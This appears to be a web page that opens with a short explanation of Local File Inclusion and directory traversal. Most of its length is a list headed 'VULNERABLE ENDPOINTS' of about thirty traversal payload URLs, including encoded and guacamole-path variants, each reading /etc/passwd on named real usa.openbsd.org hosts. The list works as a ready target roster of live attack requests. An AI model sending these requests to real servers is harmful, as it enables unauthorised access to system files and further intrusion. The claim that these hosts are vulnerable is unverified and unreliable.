An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.
Directory Traversal Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows. http://example.com/?file=../../../../etc/passwd In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack. VULNERABLE ENDPOINTS: http://ftp.usa.openbsd.org/node_modules/../../../../../etc/passwd http://ftp.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ http://ftp.usa.openbsd.org/static/../../../a/../../../../etc/passwd https://ftp5.usa.openbsd.org/node_modules/../../../../../etc/passwd https://ftp5.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd http://ftp5.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ http://ftp4.usa.openbsd.org/node_modules/../../../../../etc/passwd https://ftp4.usa.openbsd.org/node_modules/../../../../../etc/passwd https://ftp4.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd https://ftp4.usa.openbsd.org/static/../../../a/../../../../etc/passwd https://ftp4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ http://ftp5.usa.openbsd.org/node_modules/../../../../../etc/passwd http://ftp5.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd http://ftp5.usa.openbsd.org/static/../../../a/../../../../etc/passwd https://ftp5.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://ftp3.usa.openbsd.org/node_modules/../../../../../etc/passwd http://ftp3.usa.openbsd.org/node_modules/../../../../../etc/passwd http://ftp3.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd http://ftp3.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://ftp3.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd https://ftp5.usa.openbsd.org/static/../../../a/../../../../etc/passwd https://ftp3.usa.openbsd.org/static/../../../a/../../../../etc/passwd http://ftp3.usa.openbsd.org/static/../../../a/../../../../etc/passwd http://anoncvs4.usa.openbsd.org/node_modules/../../../../../etc/passwd http://anoncvs4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ http://anoncvs4.usa.openbsd.org/..%%2f..%%2f..%%2f..%%2f..%%2f..%%2f..%%2fetc/passwd https://anoncvs4.usa.openbsd.org/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://anoncvs4.usa.openbsd.org/static/../../../a/../../../../etc/passwd
